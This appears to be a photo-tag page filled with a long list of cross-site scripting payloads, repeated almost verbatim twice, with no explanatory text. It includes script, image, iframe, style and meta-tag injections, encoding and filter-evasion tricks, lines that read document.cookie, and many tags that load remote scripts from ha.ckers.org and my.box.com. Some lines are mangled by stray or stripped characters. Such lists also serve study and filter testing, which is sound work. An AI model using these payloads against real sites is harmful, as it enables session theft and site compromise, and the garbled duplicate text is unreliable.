View allAll Photos Tagged referenceerror
alert(123);
alert("XSS");
alert(123)
alert("hellox worldss");
alert(“XSS”)
alert(“XSS”);
alert(‘XSS’)
“>alert(“XSS”)
alert(/XSS”)
alert(/XSS/)
alert(1)
‘; alert(1);
‘)alert(1);//
alert(1)
{font-family:''
<input/onmouseover="javaSCRIPT:confirm(1)"
alert(1) {Opera}
<img/src=`%00` onerror=this.onerror=confirm(1)
<isindex formaction="javascript:confirm(1)"
<img src=`%00`
 onerror=alert(1)

prompt(1)</ScRipT giveanswerhere=?
/*%00*/alert(1)/*%00*/</script /*%00*/
">%00
<iframe/src="data:text/html,">
</script
<script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}
http://www.googlealert(document.location)</script
<img/src=@ onerror = prompt('1')
<style/onload=prompt('XSS')
alert(String.fromCharCode(49))</script ^__^
/**/alert(document.location)/**/</script :-(
�
/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/
alert(0%0)
SPAN
<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=	prompt(1)
">{-o-link-source:''
OnMouseOver {Firefox & Opera}
^__^
X {IE7}
<iframe/%00/ src=javaSCRIPT:alert(1)
////
/*iframe/src*/<iframe/src="
//|\\ //|\\ </script //|\\
/{src:''/
<plaintext/onmouseover=prompt(1)
''alert(1) {Opera}
DIV
On Mouse Over
<%
<iframe/src \/\/onload = prompt(1)
<iframe/onreadystatechange=alert(1)
<svg/onload=alert(1)
<input value=<iframe/src=javascript:confirm(1)
<input type="text" value=`` X
www.alert(1)</script .com
alert(1)
MsgBox+1
<a href="data:text/html;base64_,">X</a
~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
</script a=\u0061 & /=%2F
</script
+-+-1-+-+alert(1)
/*<script* */alert(1)</script
<img src ?itworksonchrome?\/onerror = alert(1)
//
confirm(1);</script
alert(1)
alert(1) </script 1=2
style="x:">
<--` --!>
x
">
CLICKME
String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)
‘;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//–>”>’>alert(String.fromCharCode(88,83,83))
alert(“XSS”)”>
<alert(“XSS”);//<
%253cscript%253ealert(1)%253c/script%253e
“>alert(document.cookie)
fooalert(1)
<script>alert(1)</script>
<IMG SRC=”javascript:alert(‘XSS’)”
<iframe src=http://ha.ckers.org/scriptlet.html <
javascript:alert("hellox worldss")
">'>alert(String.fromCharCode(88,83,83))
" SRC="http://ha.ckers.org/xss.js">
" '' SRC="http://ha.ckers.org/xss.js">
'" SRC="http://ha.ckers.org/xss.js">
'>" SRC="http://ha.ckers.org/xss.js">
document.write("<SCRI");PT SRC="http://ha.ckers.org/xss.js">
<alert("XSS");//<
">'>alert(String.fromCharCode(88,83,83))
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>alert(String.fromCharCode(88,83,83))&submit.x=27&submit.y=9&cmd=search
alert("hellox worldss")&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510
alert("XSS");&search=1
0&q=';alert(String.fromCharCode(88,83,83))//\';alert%2?8String.fromCharCode(88,83,83))//";alert(String.fromCharCode?(88,83,83))//\";alert(String.fromCharCode(88,83,83)%?29//-->">'>alert(String.fromCharCode(88,83%?2C83))&submit-frmGoogleWeb=Web+Search
hellox worldss
...
lol
<img src="
alert(1)">
alert(1)">
alert(1)">
alert(1)'>">
alert(1)">
alert(123)">
LOL
LOL*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*IE,Safari*[0]/color:green;color:bl/*IE*/ue;}
({0:#0=alert/#0#/#0#(0)})
LOLalert(123)
<SCRIPT>alert(/XSS/.source)</SCRIPT>
\\";alert('XSS');//
</TITLE><SCRIPT>alert(\"XSS\");</SCRIPT>
<INPUT TYPE=\"IMAGE\" SRC=\"javascript:alert('XSS');\">
<BODY BACKGROUND=\"javascript:alert('XSS')\">
<BODY ONLOAD=alert('XSS')>
<IMG DYNSRC=\"javascript:alert('XSS')\">
<IMG LOWSRC=\"javascript:alert('XSS')\">
<BGSOUND SRC=\"javascript:alert('XSS');\">
<BR SIZE=\"&{alert('XSS')}">
<LAYER SRC=\"http://ha.ckers.org/scriptlet.html\"></LAYER>
<LINK REL=\"stylesheet\" HREF=\"javascript:alert('XSS');\">
<LINK REL=\"stylesheet\" HREF=\"http://ha.ckers.org/xss.css\">
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
<META HTTP-EQUIV=\"Link\" Content=\"<http://ha.ckers.org/xss.css>; REL=stylesheet\">
<STYLE>BODY{-moz-binding:url(\"http://ha.ckers.org/xssmoz.xml#xss\")}</STYLE>
<XSS STYLE=\"behavior: url(xss.htc);\">
<STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS
<IMG SRC='vbscript:msgbox(\"XSS\")'>
<IMG SRC=\"mocha:[code]\">
<IMG SRC=\"livescript:[code]\">
žscriptualert(EXSSE)ž/scriptu
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\">
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\"
<IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME>
<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>
<TABLE BACKGROUND=\"javascript:alert('XSS')\">
<TABLE><TD BACKGROUND=\"javascript:alert('XSS')\">
<DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">
<DIV STYLE=\"background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029\">
<DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">
<DIV STYLE=\"width: expression(alert('XSS'));\">
<STYLE>@im\port'\ja\vasc\ript:alert(\"XSS\")';</STYLE>
<IMG STYLE=\"xss:expr/*XSS*/ession(alert('XSS'))\">
<XSS STYLE=\"xss:expression(alert('XSS'))\">
exp/*<A STYLE='no\xss:noxss(\"*//*\");
xss:ex/*XSS*//*/*/pression(alert(\"XSS\"))'>
<STYLE TYPE=\"text/javascript\">alert('XSS');</STYLE>
<STYLE>.XSS{background-image:url(\"javascript:alert('XSS')\");}</STYLE><A CLASS=XSS></A>
<STYLE type=\"text/css\">BODY{background:url(\"javascript:alert('XSS')\")}</STYLE>
<!--[if gte IE 4]>
<SCRIPT>alert('XSS');</SCRIPT>
<![endif]-->
<BASE HREF=\"javascript:alert('XSS');//\">
<OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http://ha.ckers.org/scriptlet.html\"></OBJECT>
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
<EMBED SRC=\"http://ha.ckers.org/xss.swf\" AllowScriptAccess=\"always\"></EMBED>
<EMBED SRC=\"data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\" type=\"image/svg+xml\" AllowScriptAccess=\"always\"></EMBED>
a=\"get\";
b=\"URL(\\"\";
c=\"javascript:\";
d=\"alert('XSS');\\")\";
eval(a+b+c+d);
<HTML xmlns:xss><?import namespace=\"xss\" implementation=\"http://ha.ckers.org/xss.htc\"><xss:xss>XSS</xss:xss></HTML>
<XML ID=I><X><C><![CDATA[<IMG SRC=\"javas]]><![CDATA[cript:alert('XSS');\">]]>
</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
<XML ID=\"xss\"><I><B><IMG SRC=\"javas<!-- -->cript:alert('XSS')\"></B></I></XML>
<SPAN DATASRC=\"#xss\" DATAFLD=\"B\" DATAFORMATAS=\"HTML\"></SPAN>
<XML SRC=\"xsstest.xml\" ID=I></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
<HTML><BODY>
<?xml:namespace prefix=\"t\" ns=\"urn:schemas-microsoft-com:time\">
<?import namespace=\"t\" implementation=\"#default#time2\">
<t:set attributeName=\"innerHTML\" to=\"XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>\">
</BODY></HTML>
<SCRIPT SRC=\"http://ha.ckers.org/xss.jpg\"></SCRIPT>
<!--#exec cmd=\"/bin/echo '<SCR'\"--><!--#exec cmd=\"/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'\"-->
<? echo('<SCR)';
echo('IPT>alert(\"XSS\")</SCRIPT>'); ?>
<IMG SRC=\"http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode\">
Redirect 302 /a.jpg victimsite.com/admin.asp&deleteuser
<META HTTP-EQUIV=\"Set-Cookie\" Content=\"USERID=<SCRIPT>alert('XSS')</SCRIPT>\">
<HEAD><META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-7\"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
<SCRIPT a=\">\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<SCRIPT =\">\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<SCRIPT a=\">\" '' SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<SCRIPT \"a='>'\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<SCRIPT a=`>` SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<SCRIPT a=\">'>\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<SCRIPT>document.write(\"<SCRI\");</SCRIPT>PT SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<A HREF=\"http://66.102.7.147/\">XSS</A>
<A HREF=\"http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\">XSS</A>
<A HREF=\"http://1113982867/\">XSS</A>
<A HREF=\"http://0x42.0x0000066.0x7.0x93/\">XSS</A>
<A HREF=\"http://0102.0146.0007.00000223/\">XSS</A>
<A HREF=\"htt p://6 6.000146.0x7.147/\">XSS</A>
<A HREF=\"//www.google.com/\">XSS</A>
<A HREF=\"//google\">XSS</A>
<A HREF=\"http://ha.ckers.org@google\">XSS</A>
<A HREF=\"http://google:ha.ckers.org\">XSS</A>
<A HREF=\"http://google.com/\">XSS</A>
<A HREF=\"http://www.google.com./\">XSS</A>
<A HREF=\"javascript:document.location='http://www.google.com/'\">XSS</A>
<A HREF=\"http://www.gohttp://www.google.com/ogle.com/\">XSS</A>
<
%3C
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
\x3c
\x3C
\u003c
\u003C
<iframe src=http://ha.ckers.org/scriptlet.html>
<IMG SRC=\"javascript:alert('XSS')\"
<SCRIPT SRC=//ha.ckers.org/.js>
<SCRIPT SRC=http://ha.ckers.org/xss.js?<B>
<<SCRIPT>alert(\"XSS\");//<</SCRIPT>
<SCRIPT/SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(\"XSS\")>
<SCRIPT/XSS SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<IMG SRC=\" javascript:alert('XSS');\">
perl -e 'print \"<SCR\0IPT>alert(\\"XSS\\")</SCR\0IPT>\";' > out
perl -e 'print \"<IMG SRC=java\0script:alert(\\"XSS\\")>\";' > out
<IMG SRC=\"jav ascript:alert('XSS');\">
<IMG SRC=\"jav
ascript:alert('XSS');\">
<IMG SRC=\"jav ascript:alert('XSS');\">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG \"\"\"><SCRIPT>alert(\"XSS\")</SCRIPT>\">
<IMG SRC=`javascript:alert(\"RSnake says, 'XSS'\")`>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=\"javascript:alert('XSS');\">
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
'';!--\"<XSS>=&{()}
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//\\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>\">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>alert(String.fromCharCode(88,83,83))
'';!--"=&{()}
alert("XSS")">
<alert("XSS");//<
a=/XSS/alert(a.source)
\";alert('XSS');//
alert("XSS");
¼script¾alert(¢XSS¢)¼/script¾
@im\port'\ja\vasc\ript:alert("XSS")';
a="get";b="URL(ja\"";c="vascr";d="ipt:ale";e="rt('XSS');\")";eval(a+b+c+d+e);
document.write("<SCRI");PT SRC="http://ha.ckers.org/xss.js">
TESTHTML5FORMACTION
crosssitespt
<img src="
alert(1)">
alert(1)">
alert(1)">
({0:#0=alert/#0#/#0#(123)})
ReferenceError.prototype.__defineGetter__('name', function(){alert(123)}),x
Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')()
{alert(1)};1
crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')
alert(1)
+ADw-script+AD4-alert(document.location)+ADw-/script+AD4-
%2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4-
+ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi-
%2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-
%253cscript%253ealert(document.cookie)%253c/script%253e
“>alert(document.cookie)
“>alert(document.cookie)
“><alert(document.cookie);//<
fooalert(document.cookie)
<script>alert(document.cookie)</script>
%22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)’%3E
‘; alert(document.cookie); var foo=’
foo\’; alert(document.cookie);//’;
alert(document.cookie)
alert(1)
">alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101))
alert(123);
alert("XSS");
alert(123)
alert("hellox worldss");
alert(XSS)
alert(XSS);
alert(XSS)
>alert(XSS)
alert(/XSS)
alert(/XSS/)
alert(1)
; alert(1);
)alert(1);//
alert(1)
{font-family:''
<input/onmouseover="javaSCRIPT:confirm(1)"
alert(1) {Opera}
<img/src=`%00` onerror=this.onerror=confirm(1)
<isindex formaction="javascript:confirm(1)"
<img src=`%00`
 onerror=alert(1)

prompt(1)</ScRipT giveanswerhere=?
/*%00*/alert(1)/*%00*/</script /*%00*/
">%00
<iframe/src="data:text/html,">
</script
<script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}
http://www.googlealert(document.location)</script
<img/src=@ onerror = prompt('1')
<style/onload=prompt('XSS')
alert(String.fromCharCode(49))</script ^__^
/**/alert(document.location)/**/</script :-(
�
/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/
alert(0%0)
SPAN
<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=	prompt(1)
">{-o-link-source:''
OnMouseOver {Firefox & Opera}
^__^
X {IE7}
<iframe/%00/ src=javaSCRIPT:alert(1)
////
/*iframe/src*/<iframe/src="
//|\\ //|\\ </script //|\\
/{src:''/
<plaintext/onmouseover=prompt(1)
''alert(1) {Opera}
DIV
On Mouse Over
<%
<iframe/src \/\/onload = prompt(1)
<iframe/onreadystatechange=alert(1)
<svg/onload=alert(1)
<input value=<iframe/src=javascript:confirm(1)
<input type="text" value=`` X
www.alert(1)</script .com
alert(1)
MsgBox+1
<a href="data:text/html;base64_,">X</a
~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
</script a=\u0061 & /=%2F
</script
+-+-1-+-+alert(1)
/*<script* */alert(1)</script
<img src ?itworksonchrome?\/onerror = alert(1)
//
confirm(1);</script
alert(1)
alert(1) </script 1=2
style="x:">
<--` --!>
x
">
CLICKME
String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)
;alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//>>>alert(String.fromCharCode(88,83,83))
alert(XSS)>
<alert(XSS);//<
%253cscript%253ealert(1)%253c/script%253e
>alert(document.cookie)
fooalert(1)
<script>alert(1)</script>
<IMG SRC=javascript:alert(XSS)
<iframe src=http://ha.ckers.org/scriptlet.html <
javascript:alert("hellox worldss")
">'>alert(String.fromCharCode(88,83,83))
" SRC="http://ha.ckers.org/xss.js">
" '' SRC="http://ha.ckers.org/xss.js">
'" SRC="http://ha.ckers.org/xss.js">
'>" SRC="http://ha.ckers.org/xss.js">
document.write("<SCRI");PT SRC="http://ha.ckers.org/xss.js">
<alert("XSS");//<
">'>alert(String.fromCharCode(88,83,83))
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>alert(String.fromCharCode(88,83,83))&submit.x=27&submit.y=9&cmd=search
alert("hellox worldss")&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510
alert("XSS");&search=1
0&q=';alert(String.fromCharCode(88,83,83))//\';alert%2?8String.fromCharCode(88,83,83))//";alert(String.fromCharCode?(88,83,83))//\";alert(String.fromCharCode(88,83,83)%?29//-->">'>alert(String.fromCharCode(88,83%?2C83))&submit-frmGoogleWeb=Web+Search
hellox worldss
...
lol
<img src="
alert(1)">
alert(1)">
alert(1)">
alert(1)'>">
alert(1)">
alert(123)">
LOL
LOL*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*IE,Safari*[0]/color:green;color:bl/*IE*/ue;}
({0:#0=alert/#0#/#0#(0)})
LOLalert(123)
<SCRIPT>alert(/XSS/.source)</SCRIPT>
\\";alert('XSS');//
</TITLE><SCRIPT>alert(\"XSS\");</SCRIPT>
<INPUT TYPE=\"IMAGE\" SRC=\"javascript:alert('XSS');\">
<BODY BACKGROUND=\"javascript:alert('XSS')\">
<BODY ONLOAD=alert('XSS')>
<IMG DYNSRC=\"javascript:alert('XSS')\">
<IMG LOWSRC=\"javascript:alert('XSS')\">
<BGSOUND SRC=\"javascript:alert('XSS');\">
<BR SIZE=\"&{alert('XSS')}\">
<LAYER SRC=\"http://ha.ckers.org/scriptlet.html\"></LAYER>
<LINK REL=\"stylesheet\" HREF=\"javascript:alert('XSS');\">
<LINK REL=\"stylesheet\" HREF=\"http://ha.ckers.org/xss.css\">
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
<META HTTP-EQUIV=\"Link\" Content=\"<http://ha.ckers.org/xss.css>; REL=stylesheet\">
<STYLE>BODY{-moz-binding:url(\"http://ha.ckers.org/xssmoz.xml#xss\")}</STYLE>
<XSS STYLE=\"behavior: url(xss.htc);\">
<STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS
<IMG SRC='vbscript:msgbox(\"XSS\")'>
<IMG SRC=\"mocha:[code]\">
<IMG SRC=\"livescript:[code]\">
scriptualert(EXSSE)/scriptu
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\">
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\"
<IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME>
<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>
<TABLE BACKGROUND=\"javascript:alert('XSS')\">
<TABLE><TD BACKGROUND=\"javascript:alert('XSS')\">
<DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">
<DIV STYLE=\"background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029\">
<DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">
<DIV STYLE=\"width: expression(alert('XSS'));\">
<STYLE>@im\port'\ja\vasc\ript:alert(\"XSS\")';</STYLE>
<IMG STYLE=\"xss:expr/*XSS*/ession(alert('XSS'))\">
<XSS STYLE=\"xss:expression(alert('XSS'))\">
exp/*<A STYLE='no\xss:noxss(\"*//*\");
xss:ex/*XSS*//*/*/pression(alert(\"XSS\"))'>
<STYLE TYPE=\"text/javascript\">alert('XSS');</STYLE>
<STYLE>.XSS{background-image:url(\"javascript:alert('XSS')\");}</STYLE><A CLASS=XSS></A>
<STYLE type=\"text/css\">BODY{background:url(\"javascript:alert('XSS')\")}</STYLE>
<!--[if gte IE 4]>
<SCRIPT>alert('XSS');</SCRIPT>
<![endif]-->
<BASE HREF=\"javascript:alert('XSS');//\">
<OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http://ha.ckers.org/scriptlet.html\"></OBJECT>
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
<EMBED SRC=\"http://ha.ckers.org/xss.swf\" AllowScriptAccess=\"always\"></EMBED>
<EMBED SRC=\"data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\" type=\"image/svg+xml\" AllowScriptAccess=\"always\"></EMBED>
a=\"get\";
b=\"URL(\\"\";
c=\"javascript:\";
d=\"alert('XSS');\\")\";
eval(a+b+c+d);
<HTML xmlns:xss><?import namespace=\"xss\" implementation=\"http://ha.ckers.org/xss.htc\"><xss:xss>XSS</xss:xss></HTML>
<XML ID=I><X><C><![CDATA[<IMG SRC=\"javas]]><![CDATA[cript:alert('XSS');\">]]>
</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
<XML ID=\"xss\"><I><B><IMG SRC=\"javas<!-- -->cript:alert('XSS')\"></B></I></XML>
<SPAN DATASRC=\"#xss\" DATAFLD=\"B\" DATAFORMATAS=\"HTML\"></SPAN>
<XML SRC=\"xsstest.xml\" ID=I></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
<HTML><BODY>
<?xml:namespace prefix=\"t\" ns=\"urn:schemas-microsoft-com:time\">
<?import namespace=\"t\" implementation=\"#default#time2\">
<t:set attributeName=\"innerHTML\" to=\"XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>\">
</BODY></HTML>
<SCRIPT SRC=\"http://ha.ckers.org/xss.jpg\"></SCRIPT>
<!--#exec cmd=\"/bin/echo '<SCR'\"--><!--#exec cmd=\"/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'\"-->
<? echo('<SCR)';
echo('IPT>alert(\"XSS\")</SCRIPT>'); ?>
<IMG SRC=\"http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode\">
Redirect 302 /a.jpg victimsite.com/admin.asp&deleteuser
<META HTTP-EQUIV=\"Set-Cookie\" Content=\"USERID=<SCRIPT>alert('XSS')</SCRIPT>\">
<HEAD><META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-7\"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
<SCRIPT a=\">\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<SCRIPT =\">\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<SCRIPT a=\">\" '' SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<SCRIPT \"a='>'\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<SCRIPT a=`>` SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<SCRIPT a=\">'>\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<SCRIPT>document.write(\"<SCRI\");</SCRIPT>PT SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<A HREF=\"http://66.102.7.147/\">XSS</A>
<A HREF=\"http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\">XSS</A>
<A HREF=\"http://1113982867/\">XSS</A>
<A HREF=\"http://0x42.0x0000066.0x7.0x93/\">XSS</A>
<A HREF=\"http://0102.0146.0007.00000223/\">XSS</A>
<A HREF=\"htt p://6 6.000146.0x7.147/\">XSS</A>
<A HREF=\"//www.google.com/\">XSS</A>
<A HREF=\"//google\">XSS</A>
<A HREF=\"http://ha.ckers.org@google\">XSS</A>
<A HREF=\"http://google:ha.ckers.org\">XSS</A>
<A HREF=\"http://google.com/\">XSS</A>
<A HREF=\"http://www.google.com./\">XSS</A>
<A HREF=\"javascript:document.location='http://www.google.com/'\">XSS</A>
<A HREF=\"http://www.gohttp://www.google.com/ogle.com/\">XSS</A>
<
%3C
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
<
\x3c
\x3C
\u003c
\u003C
<iframe src=http://ha.ckers.org/scriptlet.html>
<IMG SRC=\"javascript:alert('XSS')\"
<SCRIPT SRC=//ha.ckers.org/.js>
<SCRIPT SRC=http://ha.ckers.org/xss.js?<B>
<<SCRIPT>alert(\"XSS\");//<</SCRIPT>
<SCRIPT/SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(\"XSS\")>
<SCRIPT/XSS SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
<IMG SRC=\" javascript:alert('XSS');\">
perl -e 'print \"<SCR\0IPT>alert(\\"XSS\\")</SCR\0IPT>\";' > out
perl -e 'print \"<IMG SRC=java\0script:alert(\\"XSS\\")>\";' > out
<IMG SRC=\"jav ascript:alert('XSS');\">
<IMG SRC=\"jav
ascript:alert('XSS');\">
<IMG SRC=\"jav ascript:alert('XSS');\">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG \"\"\"><SCRIPT>alert(\"XSS\")</SCRIPT>\">
<IMG SRC=`javascript:alert(\"RSnake says, 'XSS'\")`>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=\"javascript:alert('XSS');\">
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
'';!--\"<XSS>=&{()}
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//\\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>\">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>alert(String.fromCharCode(88,83,83))
'';!--"=&{()}
alert("XSS")">
<alert("XSS");//<
a=/XSS/alert(a.source)
\";alert('XSS');//
alert("XSS");
scriptalert(XSS)/script
@im\port'\ja\vasc\ript:alert("XSS")';
a="get";b="URL(ja\"";c="vascr";d="ipt:ale";e="rt('XSS');\")";eval(a+b+c+d+e);
document.write("<SCRI");PT SRC="http://ha.ckers.org/xss.js">
TESTHTML5FORMACTION
crosssitespt
<img src="
alert(1)">
alert(1)">
alert(1)">
({0:#0=alert/#0#/#0#(123)})
